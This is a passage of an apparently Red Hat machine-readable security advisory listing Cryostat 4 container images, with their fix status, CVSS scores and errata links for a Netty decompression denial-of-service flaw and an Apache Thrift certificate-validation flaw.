"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: Netty: Incorrect HTTP response parsing leads to data confusion"
},
{
"cve": "CVE-2026-42587",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-05-13T19:01:35.415881+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477220"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in Netty\u0027s HTTP content decompression. A remote attacker can exploit this flaw by sending specially crafted compressed payloads using Brotli, Zstandard, or Snappy encodings, bypassing configured decompression limits. This leads to unbounded memory allocation, potentially causing an out-of-memory condition and rendering affected Red Hat systems unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
],
"known_not_affected": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42587"
},
{
"category": "external",
"summary": "RHBZ#2477220",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477220"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42587",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42587"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
}
],
"release_date": "2026-05-13T18:22:21.699000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-22T17:15:26+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression"
},
{
"cve": "CVE-2026-43869",
"cwe": {
"id": "CWE-295",
"name": "Improper Certificate Validation"
},
"discovery_date": "2026-05-05T08:00:56.417384+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466660"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Apache Thrift. This vulnerability involves improper validation of a certificate with a host mismatch, which could allow a remote attacker to bypass security checks. By presenting a specially crafted certificate, an attacker may impersonate a legitimate server or client. This could lead to a security bypass, potentially enabling unauthorized access or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Apache Thrift: Apache Thrift: Security bypass due to improper certificate validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
],
"known_not_affected": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-43869"
},
{
"category": "external",
"summary": "RHBZ#2466660",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466660"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-43869",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-43869"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-43869",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43869"
},
{
"category": "external",
"summary": "https://lists.apache.org/thread/3hsgl1b69wzq3ry39scqbv2dhyl3j52r",
"url": "https://lists.apache.org/thread/3hsgl1b69wzq3ry39scqbv2dhyl3j52r"
}
],
"release_date": "2026-05-05T07:25:48.611000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-22T17:15:26+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:28010"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:cdecc70f89a5ab3e5814561bca539a070389eca8566e84397a0e998f3ccb88e6_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:064fa3780f79011c98dcabe589fedaa66755904e298714d3753b06dc07011e6e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-db-rhel9@sha256:6259b43f01e14bcfd66cc720f0e385a26c25e38d6085581cf52de5f1955edbed_arm64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:42700ce6541e2e989b2f2f11877139e0283bb6b62f2c7988f24703a809798c6f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-grafana-dashboard-rhel9@sha256:c9a5f19878b38c4e3cd2cc1f0afb9b5c3e51f93195c6d2a789d5a2ebd5c40f20_arm64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:d11c60a59969db188675694ea70e975347645da7dddcba451856f93715d46a4f_amd64",
"9Base-Cryostat-4:cryostat/cryostat-openshift-console-plugin-rhel9@sha256:ec4ad72eeff4ad2c81e22f2b6d29dc0113ac38a163de3245c8ff84e738b3892a_arm64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:08bc4c4c4049ece749ebbf00e2da6f4e2da1fd28635508268f13e4c8ee81f001_amd64",
"9Base-Cryostat-4:cryostat/cryostat-operator-bundle@sha256:131c5273c1cfc51060514f8ffe76ec2999ccd39e598dee09a2f151addbae9cb4_arm64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:a84bde7d350a83bbdc60ef80bdcad3d1d4c7794816ee02c3bbcd185a0881c838_amd64",
"9Base-Cryostat-4:cryostat/cryostat-reports-rhel9@sha256:ba96c3f24fb861b6214f6a7b1bf778deb032a654542c40a5af9eebdcfece3834_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:4cd0a3b5132ee4bfd17332247a254b680cacb4501792055a2772712a65fae3c9_arm64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9-operator@sha256:76a3ad2cb49b44aaee57c952c1a8a70884eac5d39bae85cddf8e995dfb20a75e_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:0a59132b639c754650bc38b836a636a76ab27531a0b2e67258e61984c32e903d_amd64",
"9Base-Cryostat-4:cryostat/cryostat-rhel9@sha256:dfda0b39740b52574fa44dd8830338c1b51b0027c78e3a679a1f0ba7f8dbddbd_arm64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:4ebed4d89315d7f8baa80d8f54d26351ff8e7aac7c29dfb8dd28acb455ecba65_amd64",
"9Base-Cryostat-4:cryostat/cryostat-storage-rhel9@sha256:9c5a9f6f958e02c89bdee98fe828e23ede3ec50f2386ab2f479d8dff1dce99e2_arm64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:391f217a593b1992f949590b6084343acf3935ed039da1b137a62184d664a50f_amd64",
"9Base-Cryostat-4:cryostat/jfr-datasource-rhel9@sha256:68307d0f051583a1fcba76766c731686e4f50159935d7b9578eba4847227dab2_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-Cryostat-4:cryostat/cryostat-agent-init-rhel9@sha256:b24e82ee4ae599b923a24317121f5e510dfb97497d0685745c02bd800734e993_arm64",
